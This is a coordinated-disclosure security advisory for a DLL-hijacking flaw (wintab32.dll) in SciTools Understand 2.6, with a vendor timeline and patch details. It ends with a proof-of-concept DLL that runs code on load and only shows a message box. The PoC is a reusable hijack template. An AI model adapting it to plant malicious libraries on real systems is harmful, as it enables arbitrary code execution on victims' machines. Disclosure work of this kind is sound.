/* SciTools Understand 2.6 (wintab32.dll) DLL Loading Arbitrary Code Execution Vendor: Scientific Toolworks, Inc. Product web page: http://www.scitools.com Affected version: 2.6 (build 598) Summary: Understand is a static analysis tool for maintaining, measuring, and analyzing critical or large code bases. Desc: The vulnerability is caused due to the application loading libraries (wintab32.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening an Understand Project file (.UDB) located on a remote WebDAV or SMB share. Tested on: Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [29.01.2012] Vulnerability discovered. [30.01.2012] Contact with the vendor. [30.01.2012] Vendor replies with e-mail info for their european partner. [30.01.2012] Contacted the new e-mail given with sent details and PoC code. [31.01.2012] Vendor answers and sends the report to the appropriate division. [31.01.2012] Asked vendor for confirmation and scheduled patch release date. [02.02.2012] Vendor responds with confirmation and a scheduled release for a fix. [08.02.2012] Vendor releases patched version 2.6.600 (Build 600): http://scitools.com/download/latest/Understand/Understand-2.6.600-Windows-32bit.exe. [08.02.2012] Coordinated public security advisory released. Advisory ID: ZSL-2012-5071 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5071.php Vendor advisory: http://www.scitools.com/support/buildLogs.php 29.01.2012 */ #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "DLL Flownapped!", "DLL Message", MB_OK); }